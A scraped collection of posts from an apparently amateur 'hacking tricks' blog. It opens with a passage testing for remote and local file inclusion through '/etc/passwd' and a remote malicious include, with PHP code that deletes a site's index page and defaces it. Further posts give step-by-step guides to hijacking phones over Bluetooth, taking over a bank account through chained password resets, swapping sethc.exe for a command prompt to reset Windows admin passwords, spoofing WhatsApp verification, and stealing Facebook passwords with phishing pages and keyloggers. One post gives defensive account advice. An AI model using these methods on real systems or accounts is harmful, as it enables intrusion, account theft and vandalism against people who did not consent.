Testing Inputs For Vulnerability
Try visiting “index.php?p=http://www.google.com/”; if you see Google, it is vulnerable to 
RFI and consequently LFI. If you don’t it’s not vulnerable to RFI, but still may be 
vulnerable to LFI. Assuming the server is running *nix, try viewing 
“index.php?p=/etc/passwd”; if you see the passwd file, it’s vulnerable to LFI; else, it’s 
not vulnerable to RFI or LFI.
Example Exploit
Let’s say the target is vulnerable to RFI and we upload the following PHP code to our 
server
PHP Code:
<?php
unlink(“index.php”);
system(“echo Hacked > index.php”);
?>
and then we view “index.php?p=http://our.site.com/malicious.php” then our malicious code 
will be run on their server, and by doing so, their site will simply say ‘Hacked’ now.
Read More
365daysmasti

How to hack someone’s Mobile Phone in 5 minutes

Hey guys today i am telling you how to hack someone’s mobile phone easily via Bluetooth. You can hack it tocall for free, can have the data over it, and anything you wanna do. It is the mobile Bluetooth hacker software that i am using now to do so. It is a software which can be used to hack any mobile phone through Bluetooth network. Once connected to a another phone via Bluetooth
How To Hack Any Moblie Via Bluetooth 100 % Working-
1) Call from his phone. It includes all call functions like hold etc.
2) Read his messages
3) Read his contacts
4) Change profile
5) Play his ringtone even if phone is on silent
6) Play his songs(in his phone)
7) Restart the phone
8) Switch off the phone
9) Restore factory settings
10) Change ringing volume
Note:
1.) When connecting devices use a code 0000
2.) At start of programming on smartphones do not forget to turn on bluetooth before start of theapplication
What else you want
Just go and-  Super Bluetooth Hack download
Share your views in comments.
Read More
365daysmasti

7 Steps to hack a bank account



The experiment:
Herbert Thompson* in 2008 wanted to show the public how easy it was to access someone’s personal information and bank account.
He did the experiment on someone who he barely knew, a girl named Kim. Using the knowledge he knew about her, her name, where she was from, where she worked and roughly her age, he was able to access her bank account in ONLY 7 STEPS!!!
Read below to see how he did it – in the days before Facebook!
Step 1
Google search. He googles her. Finds a blog and a resume. (Thompson called her blog a “goldmine.”) He gets information about grandparents, pets, and hometown. Most importantly he gets her college email address and current Gmail address.
Step 2
Next stop: Password recovery feature on her bank’s web site. He attempts to reset her bank password. The bank sends a reset link to her email, which he does not have access to. He needs to get access to her Gmail.
Step 3
Gmail access. He attempts to reset her Gmail password but Gmail sends this to her college email address. Gmail tells you this address’ domain (at least it did in 2008 when Thompson conducted the experiments) so he knew he had to get access to that specific address.
Step 4
College email account page. Thompson clicks the “forgot password” link on this page and winds up facing a few questions. Home address, home zip code and home country? No problem, Thompson has it all from the same resume. The same resume found from the simple Google search done earlier. Then came a stumbling block: the college wanted her birthday. But he only had a rough idea of her age, no actual birth date.
Step 5
State traffic court web site. Apparently, you can search for violations and court appearances by name! And such records include a birth date. (Facebook also makes this piece of data very easy to get even if people do not note their birth year… Remember Thompson knew roughly how old Kim was.) But he had no luck with the Department of Motor Vehicles.
Step 6
Thompson goes back to the blog and does a search for “birthday.” He gets a date but no year.
Step 7
Finally, Thompson attempts the college reset password again. He fills in her birth date, and simply guesses the year. He gets it wrong. But the site gives him five chances, and tells him which field has the error. So he continues to guess. He gets access in under five guesses. He changes her college password. This gives him access to her Gmail password reset email. Google requires some personal information which he is able to get easily from her blog (e.g., father’s middle name.) Thompson changes the Gmail password and that gives him access to the bank account reset password email. Here again he is asked for personal information, but nothing that he could not glean from Kim’s blog (e.g., pet name and phone number.) He resets the bank password and bingo, has immediate access to all her records and money.
Read More
365daysmasti

How to change any administrator password in Windows 7



Today we will learn how to change any administrator password in Windows 7 without using any software or CD or any tool i.e. Perfectly manual method to reset any windows administrator password in windows 7 in less than a minute. Sometimes users forget their windows password when they have recently reseted it, so they don’t have any option to login into system and which sometimes results into data loss. Note: This method also works on Windows 8 and Windows 10.

How to change any administrator password in Windows 7 :

STEP 1: First, restart your computer on which windows 7 is installed.


STEP 2: Once you get below screen, hold the power button on the computer until it turns off (no damage will be done, trust me).

STEP 3: You will get screen as shown in the screenshot below if done correctly. If you get something like “Windows did not shut down correctly,” try again.

Otherwise, select “Launch Startup Repair.”


STEP 4: Now select “Cancel” on below screen:

STEP 5: Now click on “Show problem details.” as shown below, and click the link on that appears on the bottom, doing that you  notepad should pop up.

STEP 6: Go to File/Open, and double-click your “Local Disk” ( Default will be probably C:/).

STEP 7: Go to Windows/System32. Now do EXACTLY as I say, or you MIGHT break the computer.

Under “Files of type,” select “All files.” Scroll down and find “cmd,” then make a copy of it in the same folder (Ctrl-C, Ctrl-V).
You should get a file named “cmd – Copy” or something like that.

STEP 8: Find “sethc” in the same folder. This file executes sticky keys. Rename it to “sethc 1.”


STEP 9: Rename your “cmd – Copy” to “sethc.” Close notepad, and hit “Finish” now  restart your computer manually.

STEP 10: Once you get back to the login screen, press “Shift” 5 times to open up the command prompt.

STEP 11: Next, we need to find out what user is the local administrator for this PC. To do this, type “net localgroup Administrators” and look for any administrator that does NOT have your school/work domain in front of it, followed by a “/.”

As you can see, one of the admins is named “qwaszx.”

STEP 12: Now, we need to change that account’s password.
Type “net user <ACCOUNT NAME HERE> *” and type the new password twice.

It will be blank while you will be typing the password but your keytrokes will be recorded!!

The workspaces also like to disable the admin account you just changed the password for, so you might not be able to log in.If you get that message do the step as shown below:-

STEP 13: If the admin account is disabled, type “net user <ACCOUNT NAME HERE> /active:yes” You will now be able to log in.
STEP 14: That’s it! You now have full admin rights to the PC.

WARNING: I will not be held responsible if you do this at school/work!
This is only for Educational Purpose!!

Thank you : 
Read More
365daysmasti

How to Protect Facebook accounts from Hackers



Protect Facebook accounts from hackers Guide by Hackingloops : Most of our users have asked us about that how to protect Facebook accounts from Hackers. Facebook is most used Social Networking platform and its always on target for hackers. But on the same side, Facebook’s internal security is good enough that 90% of hack attempts don’t succeed. Facebook itself continuously working on security and new techniques to protect Facebook accounts from Hackers.  But there are some scenarios which Facebook cannot protect Facebook accounts because these require user’s awareness in order to protect Facebook accounts.  Facebook cannot prevent your account from Social Engineering attacks, honey traps and freebie luring as all these things require user awareness. Today we will discuss all techniques or traps which hackers can use to hack your Facebook account passwords and how we can protect Facebook accounts against these traps. So let’s begin..
Note: This tutorial will be helpful for every Social Network and Even Securing Email accounts and its a must read for all Hackingloops users.

Protect Facebook accounts from Hackers :

Facebook Internal Settings to make Protect Facebook accounts :


This is most important step to protect Facebook accounts.  Below are some points listed which you need to update for securing your Facebook account.

  1. Create Strong Passwords so that it cannot be easily guessed and it should be familiar enough that you can type it real quick, so that someone cannot shoulder smurf or see it while you are typing. Always use a combination of uppercase, lowercase, number and special character combinations and try to keep it at least 8 characters long. I am not focusing much on length because brute force attacks wont work on Facebook, they already had protection for that. But always keep your passwords strong and avoid typing passwords in front of other people to avoid shoulder smurfing.
  2. Update your mobile number along with recovery email address. But why? Because now every time when you or someone change your password you will get a reset link on your mobile and recovery email address.
  3. Update your security questions to that it cannot be easily guessed. For example, choose a security question like what is your favorite city and answer it like your favorite car or some other code but never city.
  4. Update list of 5 trusted friends which can be used to recover your password with help of 3 friends. If you choose it wisely, then this 3 friend hack will never going to work as it will always show 3 friends out of your chosen list.
  5. You can also use 2 way authentication method which is called Activate login approvals in Facebook. But note that you will always need your mobile for this as it send a unique code on your mobile every time you attempt to login.
  6. Always unclick on Keep me login check box shown on login page. This will prevent your sessions to remain alive after certain period of time i.e. time till which Facebook persistent cookie will expire. Which usually expires when you close your browser or delete your history.
  7. Always Sign off after usage.
These were some internal things.

Protect Facebook accounts from Social Engineering attacks :

There are multiple social engineering techniques which hackers nowadays use in order to hack Facebook accounts or other Social Engineering accounts.

Prevention again Phishing attacks :

Traditionally hackers use Phish or Fake pages to trap users to harvest their Facebook accounts passwords. But as technology getting advanced so do hackers, they are advancing even faster than technology. Below i will touch base latest Phishing techniques and techniques that hackers use and ways to protect Facebook accounts from those traps.

  1. Traditional Phish or Fake Pages : Hacker creates exact same copy of web pages and uploads them to some free web server and distributes its link via email, open chats, embed in images etc. But it is not that effective as most people are aware and look for URL in the URL address bar and when they find it different from actual one they don’t login and sometimes even report to authorities of Fake pages.  So always check the URL before logging into your account.
  2. Social Login Traps : Nowadays you guys might have noticed that some sites provides a social login feature i.e. you can use your social networking account to login into their websites. Hackers are using this to trap users, they are setting up fake websites and provide some luring features likes coupon codes, freebie items, free full software’s, templates, themes, movies or music etc. Its normal tendency of human to go for such lures and they end up giving their credentials to malicious hackers.
  3. Tabnabbing Traps : Even more advanced phishing techniques in place in market nowadays. Hackers are creating malicious websites mentioned in above point and using meta refresh and auto redirect features to redirect users to their fake pages or phish pages to capture their login credentials. For example, hacker’s create malicious websites and put meta refresh tags and redirects on particular time intervals say 2 minutes or 5 minutes. When this time interval passes suddenly their fake page pops up asking you to login into your accounts.
  4. Emails with HTML and Word Docs : One more awesome attack practice hackers are nowadays using to trap users are by sending emails with HTML and DOCs as attachment. When user opens those attachments, a vb macro or meta refresh executes which pops up a fake social networking page and asks for your credentials. For example, hackers send emails for some lottery wins, job opportunities, offers to your emails having HMTL and DOC attachments and when you open these mails you end up sharing your login credentials with hackers.
  5. Freebie Traps : Have you guys ever give a thought that why anyone would provide you anything for free. For example, hack a software and share with you for free or upload a 2GB movie to some website or torrent and make it available for free , or even simpler purchase a music cd and upload songs to some website and provide it for free to you? Off course not. What they do is that they attach their malwares or spywares or Trojans or keyloggers with them with help of binders and when you download it, you compromises your machines with hackers which they can use for their purpose whenever they require. Most hackers spread their botnets with help of freebie traps and use your machines for their malicious works like DDOS attacks. So always avoid using torrent, free download websites if you want to remain secure.


Read More
365daysmasti

How to use WhatsApp without any Phone Number ?


How to use WhatsApp without any Phone Number ? WhatsApp requires your mobile number in order to create a WhatsApp account, if you don’t want to use your phone number for some reasons, you can still use WhatsApp, send/receive messages from it.

How to WhatsApp without any Phone Number? Well, here are the steps:
  1. Uninstall WhatsApp if already installed in your mobile phone but you can keep WhatsApp images/video files.
  2. Download and Install WhatsApp again.
  3.  Block your message service by simply shifting to flight mode. Now, open WhatsApp and add your number to it. So, it will not able to send message to server and verify your mobile number.
  4. As verification is still incomplete and messages are blocked, Whatsapp will ask you to choose alternative method to verify. Choose ‘Verify through SMS’ and enter your email address. Click ‘Send’ and without waiting for a second, click ‘Cancel’. This terminates the authorization process.
  5. Now, you are required to spoof message. Install Spoof Text Message for Android and    Fake-a-Message for iPhone.
  6. Go to your Outbox -> Copy the message details to spoofer app -> Send it to spoofed verification.
  7. Use these details in your spoofed message: To: +447900347295 From: +(Country code)(mobile number) Message: Your email address
  8. A message will be sent to that spoofed number and you can now use this number to connect with friends.

Thank you :)
Read More
365daysmasti

4 ways to Hack Facebook account password



Hi friends, I have already posted two posts on How to hack Facebook account password, first using the Keyloggers and other is using Phishing. Today I am going to reveal all the methods that can be used to hack a Facebook account password.
Today I will cover all 4 ways to Hack Facebook Account Password that all hackers usually use to hack your Facebook account.
1. Facebook Phishing Attack
2. Hacking Facebook account password remotely using Keyloggers and RAT’s
3. By hacking the primary email address that user has used for creating Facebook account.

4. Social Engineering or simply Guessing your friends Password.

Facebook Phishing Attack:
I am explaining this method first because its the most easiest and also the most popular method for hacking Facebook password. You can also search on Google the various famous Facebook hacking methods and you will find Phishing technique on the top always. And I am explaining the methods according to their popularity.
Now you want to know which is my favourite method for Hacking Facebook account passwords and i will undoubtedly tell its simply PHISHING.
If you want latest Facebook phisher then subscribe my Hacking tricks and mail me privately or post your email below in comments. I will provide you within a day, Now why i am not providing it directly, if i provide directly then Facebook will block it again like the previous one. 
Learn How to make phisher in less than 5 minutes and use them to hack Facebook accounts:
Hacking Facebook account password remotely using Keyloggers and RAT’s
Aaw… Best method for advanced Hackers. And my second favorite too. Its popularity is little but lower than Phishing only because it involves you to download hack tool and then create your keylogger and send it to victim which is a lengthy process and also unsecured too as you don’t aware that the keylogger that you downloading is himself contain some spyware or simply a keylogger attached with it. Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack Facebook password.
I have written a complete article on How to hack Facebook accounts remotely using Keyloggers, so i will recommend you to go through that if you want to learn this technique in detail.
Learn how to Hack Facebook accounts remotely using Keyloggers:

Now if you need latest Fully Undetectable Keylogger, then subscribe my hacking tricks and mail me privately or post ur email ID below in comments on which you want to get the download link.
Hacking the Primary Email address 
 If Facebook hacker or any specific Keylogger, by some means, hacks your primary Gmail or yahoo account which you are using as primary email address, then this information account can easily hack your Facebook password using “Forgot password” trick. The Hacker will simply ask Facebook to send password to the primary email address and ask Facebook administrators to send the reset email to your primary email address- which is already hacked. Thus, your Facebook account password will be reset and it will also be hacked !

Learn How to Hack Gmail Accounts Passwords:

So, always remember to protect your primary email address that you have used to create Facebook account and try to keep unknown or useless mail id as your primary email address in Facebook
.
     
Social Engineering or Guessing Passwords
This method sounds to be pretty not working at beginning. Even I was neglecting this way for a long time . But, once, I thought of using it against my friend on Facebook and amazingly what happened that i guessed his Facebook password very easily by this method. I think many of you might be knowing how what this social engineering, For novice hackers, Social engineering is method of retrieving password or Guessing the password or answer of security question simply be hacking some information about the victim or simply gathering his information from his own Facebook and other social networking profiles where most of users provide their critical information just for fashion and doesn’t know its consequences. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.
Read More